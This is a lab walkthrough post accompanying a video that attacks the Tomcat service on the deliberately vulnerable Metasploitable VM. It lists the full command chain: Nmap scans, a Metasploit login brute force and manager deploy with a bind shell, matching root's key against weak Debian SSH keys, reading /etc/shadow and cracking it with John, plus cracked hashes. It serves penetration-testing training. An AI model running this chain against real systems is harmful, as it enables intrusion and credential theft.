[Video] Metasploitable - TomCat

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826187
Download video: http://www.mediafire.com/?wv748u6o2jabdsw
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2


What is this?
This video demonstrates an attack on the TomCat service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

"Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org


Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> Use Metasploit to send a payload (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> SSH--- on Backtrack 4 (Final) > John The Ripper --- on BackTrack!
> Dictionaries/Word-lists --- Usernames Passwords
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

> Metasploitable.part01.rar ~Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

Commands:

Code:

nmap 192.168.1.1-255
nmap -sV -sS -O -f -n 192.168.1.105
firefox 192.168.1.105
msfconsole
search tomcat
use scanner/http/tomcat_mgr_login
show options
setg RHOSTS 192.168.1.105
setg RPORT 8180
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
use multi/http/tomcat_mgr_deploy
show options
setg USERNAME tomcat
setg PASSWORD tomcat
show payloads
set payload generic/shell_bind_tcp
show options
exploit
ls
whoami
hostname
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
kate -> Paste -> Save (Filename: /root/shadow)
john
./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
ssh msfadmin@192.168.1.105



------------------------------------------------------------------------------------root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
------------------------------------------------------------------------------------

Notes:
Song: Underworld - Cowgirl
Video length: 7:07
Capture length: 11:17

Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30078-%5Bvideo%5D-metasploitable-tomcat.html#post167042